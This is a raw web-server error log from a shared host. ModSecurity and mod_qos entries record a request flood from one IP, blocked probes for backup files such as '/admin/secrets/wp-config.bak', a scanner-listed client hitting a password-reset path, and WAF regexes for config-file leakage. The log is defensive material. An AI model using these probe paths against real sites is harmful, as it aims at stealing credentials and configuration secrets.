[Tue May 26 19:54:38.308857 2026] [security2:error] [pid 86490:tid 86690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBqgAAAMs"]
[Tue May 26 19:54:38.321531 2026] [security2:error] [pid 86490:tid 86620] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LByAAAAIU"]
[Tue May 26 19:54:38.339307 2026] [security2:error] [pid 86490:tid 86630] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBrQAAAI8"]
[Tue May 26 19:54:38.342838 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJWDRMqfxdEDkoszR8wAAACc"]
[Tue May 26 19:54:38.342865 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJGDRMqfxdEDkoszR1gAAACU"]
[Tue May 26 19:54:38.348523 2026] [security2:error] [pid 86490:tid 86734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LByQAAAPc"]
[Tue May 26 19:54:38.353337 2026] [security2:error] [pid 86490:tid 86684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBzQAAAMU"]
[Tue May 26 19:54:38.353621 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJGDRMqfxdEDkoszR2gAAAFM"]
[Tue May 26 19:54:38.356148 2026] [security2:error] [pid 86490:tid 86697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBxgAAANI"]
[Tue May 26 19:54:38.359325 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KGQAAAb4"]
[Tue May 26 19:54:38.372948 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJGDRMqfxdEDkoszR3AAAAGk"]
[Tue May 26 19:54:38.375946 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJGDRMqfxdEDkoszR3QAAAEQ"]
[Tue May 26 19:54:38.380097 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJWDRMqfxdEDkoszR8gAAAB8"]
[Tue May 26 19:54:38.382007 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCFAAAAMc"]
[Tue May 26 19:54:38.390073 2026] [security2:error] [pid 86490:tid 86655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCIwAAAKg"]
[Tue May 26 19:54:38.392637 2026] [security2:error] [pid 93868:tid 94315] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KGAAAAcg"]
[Tue May 26 19:54:38.401753 2026] [security2:error] [pid 86490:tid 86736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCIgAAAPk"]
[Tue May 26 19:54:38.406251 2026] [security2:error] [pid 86490:tid 86742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCHAAAAP8"]
[Tue May 26 19:54:38.410158 2026] [security2:error] [pid 86490:tid 86688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCJgAAAMk"]
[Tue May 26 19:54:38.423153 2026] [security2:error] [pid 93868:tid 94310] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJUqK9k_ZUB2Vp25KLQAAAcM"]
[Tue May 26 19:54:38.426580 2026] [security2:error] [pid 93868:tid 94288] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJUqK9k_ZUB2Vp25KLwAAAa0"]
[Tue May 26 19:54:38.431270 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCMwAAAL4"]
[Tue May 26 19:54:38.446098 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJWDRMqfxdEDkoszR_AAAABw"]
[Tue May 26 19:54:38.468571 2026] [security2:error] [pid 93576:tid 93631] [remote 74.7.241.58:42392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWtJmDRMqfxdEDkoszSGwAAfzM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-admin
[Tue May 26 19:54:38.711314 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCugAAAKA
[Tue May 26 19:54:38.714053 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCuwAAANo
[Tue May 26 19:54:38.717118 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtJlZMwN0DpLVWo6LCvQAAAK0
[Tue May 26 19:54:38.721992 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCvgAAAP8
[Tue May 26 19:54:38.724937 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCvwAAAJQ
[Tue May 26 19:54:38.726406 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCwAAAAMw
[Tue May 26 19:54:38.748816 2026] [security2:error] [pid 86490:tid 86682] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/temp/debug.log.bak"] [unique_id "ahWtJlZMwN0DpLVWo6LCwQAAAMM"]
[Tue May 26 19:54:38.749073 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCwgAAAOI
[Tue May 26 19:54:38.756489 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCwwAAAJc
[Tue May 26 19:54:38.763287 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJmDRMqfxdEDkoszSKgAAAAM
[Tue May 26 19:54:38.764805 2026] [qos:error] [pid 86490:tid 86696] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCxAAAANE
[Tue May 26 19:54:38.835475 2026] [security2:error] [pid 93576:tid 93836] [client 46.8.23.70:49023] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWtJmDRMqfxdEDkoszSDwAAAHw"], referer: https://anujtradingco.com
[Tue May 26 19:54:38.867644 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCyQAAANQ
[Tue May 26 19:54:38.868318 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCyAAAANY
[Tue May 26 19:54:38.868378 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCygAAAIg
[Tue May 26 19:54:38.873680 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCywAAAPw
[Tue May 26 19:54:38.876371 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCzAAAAM0
[Tue May 26 19:54:38.883235 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCzQAAAQM
[Tue May 26 19:54:38.901269 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCzgAAAQQ
[Tue May 26 19:54:38.909348 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCzwAAAL4
[Tue May 26 19:54:38.915727 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LC0QAAAJ0
[Tue May 26 19:54:38.920996 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJmDRMqfxdEDkoszSLAAAAGQ
[Tue May 26 19:54:38.998070 2026] [security2:error] [pid 86490:tid 86715] [client 148.113.130.225:32280] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "jetstarprojects.com"] [uri "/"] [unique_id "ahWtJlZMwN0DpLVWo6LC1QAAAOQ"]
[Tue May 26 19:54:38.998186 2026] [security2:error] [pid 86490:tid 86715] [client 148.113.130.225:32280] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jetstarprojects.com"] [uri "/"] [unique_id "ahWtJlZMwN0DpLVWo6LC1QAAAOQ"]
[Tue May 26 19:54:39.017557 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC1gAAAP4
[Tue May 26 19:54:39.021215 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC1wAAAPY
[Tue May 26 19:54:39.021605 2026] [security2:error] [pid 93576:tid 93754] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtJmDRMqfxdEDkoszSHQAAACo"]
[Tue May 26 19:54:39.024121 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC2AAAAKA
[Tue May 26 19:54:39.025552 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC2QAAANo
[Tue May 26 19:54:39.030752 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC2wAAAN0
[Tue May 26 19:54:39.040115 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC3gAAAN8
[Tue May 26 19:54:39.057267 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC3wAAAJg
[Tue May 26 19:54:39.063340 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC4AAAAP8
[Tue May 26 19:54:39.065680 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC4QAAAJQ
[Tue May 26 19:54:39.078600 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ2DRMqfxdEDkoszSLQAAAFY
[Tue May 26 19:54:39.087637 2026] [security2:error] [pid 86490:tid 86691] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/secrets/wp-config.bak"] [unique_id "ahWtJ1ZMwN0DpLVWo6LC4gAAAMw"]
[Tue May 26 19:54:39.168614 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC5AAAAJc
[Tue May 26 19:54:39.172362 2026] [qos:error] [pid 86490:tid 86696] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC5QAAANE
[Tue May 26 19:54:39.176481 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:56922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC5gAAAKk
[Tue May 26 19:54:39.178183 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC5wAAAIw
[Tue May 26 19:54:39.182314 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC6QAAAJE
[Tue May 26 19:54:39.195358 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC7AAAANY
[Tue May 26 19:54:39.209777 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC7QAAAPw
[Tue May 26 19:54:39.215816 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC7gAAAM0
[Tue May 26 19:54:39.216465 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ1ZMwN0DpLVWo6LC7wAAAQM
[Tue May 26 19:54:39.232838 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:49374] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJ2DRMqfxdEDkoszSLgAAAFI
[Tue May 26 19:54:39.280970 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJWDRMqfxdEDkoszR-wAAAGw"]
[Tue May 26 19:54:39.281921 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCJwAAAOU"]
[Tue May 26 19:54:39.295321 2026] [security2:error] [pid 86490:tid 86643] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCJQAAAJw"]
[Tue May 26 19:54:39.296609 2026] [security2:error] [pid 86490:tid 86681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCOQAAAMI"]
[Tue May 26 19:54:39.300637 2026] [security2:error] [pid 93868:tid 94265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJUqK9k_ZUB2Vp25KMgAAAZY"]
[Tue May 26 19:54:39.303178 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJkqK9k_ZUB2Vp25KRQAAAY8"]
[Tue May 26 19:54:39.306131 2026] [security2:error] [pid 86490:tid 86740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCQgAAAP0"]
[Tue May 26 19:54:39.306749 2026] [security2:error] [pid 86490:tid 86625] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCPQAAAIo"]
[Tue May 26 19:54:39.311285 2026] [security2:error] [pid 86490:tid 86642] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCSwAAAJs"]
[Tue May 26 19:54:39.311888 2026] [security2:error] [pid 86490:tid 86648] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCTQAAAKE"]
[Tue May 26 19:54:39.312703 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCTgAAAKU"]
[Tue May 26 19:54:39.316013 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJUqK9k_ZUB2Vp25KOQAAAfc"]
[Tue May 26 19:54:39.317357 2026] [security2:error] [pid 86490:tid 86745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCLgAAAQI"]
[Tue May 26 19:54:39.317770 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJWDRMqfxdEDkoszR-gAAAAU"]
